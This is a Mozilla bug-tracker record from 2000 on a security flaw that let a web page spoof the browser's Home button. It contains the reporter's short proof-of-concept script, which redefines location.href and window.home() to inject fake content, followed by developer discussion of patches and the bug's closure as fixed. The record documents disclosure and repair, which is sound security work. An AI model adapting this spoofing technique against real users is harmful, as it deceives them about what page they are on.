Closed Bug 44014 Opened 24 years ago Closed 24 years ago

spoofing user's "Home"

Categories

(Core :: Security, defect, P2)

defect

Tracking

()

VERIFIED FIXED
mozilla0.9.1

People

(Reporter: security-bugs, Assigned: security-bugs)

References

Details

(Whiteboard: [need reviews])

Attachments

(1 file)

Date: Mon, 26 Jun 2000 16:48:03 +0300 From: Georgi Guninski <joro@nat.bg> To: Mitchell Stoltz <mstoltz@netscape.com> It is possible to change the behavior of clicking the "Home" button or choosing "Go|Home" from the menu. The exploit uses __defineGetter__ and redefinion of window.home(). I think that allowing redefinition of predefined functions is not a good idea. The code is: --------------------------------------- Press the "Home" button or choose "Go|Home" in the other window in 2 seconds. <SCRIPT> a=window.open("about:blank","a"); function f() { a.location.__defineGetter__("href",function() {return "http://www.yahoo.com"}); a.window.home=new Function("this.document.body.innerHTML='Spoofed'"); a.window.home(); } setTimeout("f()",2000); </SCRIPT> ---------------------------------------
This testcase does not behave as described, but the vulnerabilities mentioned should be addressed.
Status: NEW → ASSIGNED
Can't duplicate this exploit, marking M18 for post-Beta2. Re-address this exploit and look at the issue of redefining properties.
Target Milestone: --- → M18
Fixing 36946 by marking key properties as PERMANENT will fix this too. As for __defineGetter__, this should be fixed now, i think.
Depends on: 36946
I think this no longer works, marking nsbeta3 to remind myself to look at it.
Keywords: nsbeta3
Priority: P3 → P2
Nominating for RTM, and I have opened bug 54976 on the __defineGetter__ aspect of this bug. Patrick, can you give me a + ?
Keywords: rtm
I've posted jst's patch which adds JSPROP_PERMANENT to the location property. This dosn't completely fix the problem. Looks like we have to protect location.href as well.
Mitch, are you happy with the patch in this bug? Can it go to reviews? (Is it OK to strcmp against "LOCATION" vs "location" or using strcasecmp?) The fix is reasonably small. If you think it's correct, it _might_ get approved for RTM...
Whiteboard: [need reviews]
This patch is not a complete fix. We need to restrict "location.href" as well. I'll see about getting this done.
QA Contact: czhang → junruh
Future, since the fix is not ready yet.
Target Milestone: M18 → Future
Keywords: rtm
removing rtm.
Mass changing QA to ckritzer.
QA Contact: junruh → ckritzer
Mass changing milestones to Moz0.9.1. Many of these bugs are dependent on the XPConnected DOM and its associated security UI changes.
Target Milestone: Future → mozilla0.9.1
Georgi thinks this is no longer an issue. You can still redefine window.home() but this doesn't change the behavior of the Home button anymore. There are a few other bugs dealing with redefining built-in proerties, but that's covered elsewhere, so I'm closing this one.
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
Marking VERIFIED FIXED per originator on: -MacOS91 2001-05-21-15-trunk -Win98SE 2001-05-22-06-trunk -LinRH62 2001-05-22-05-trunk
Status: RESOLVED → VERIFIED
Removing NS_Confidential flag.
Group: netscapeconfidential?
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Created:
Updated:
Size: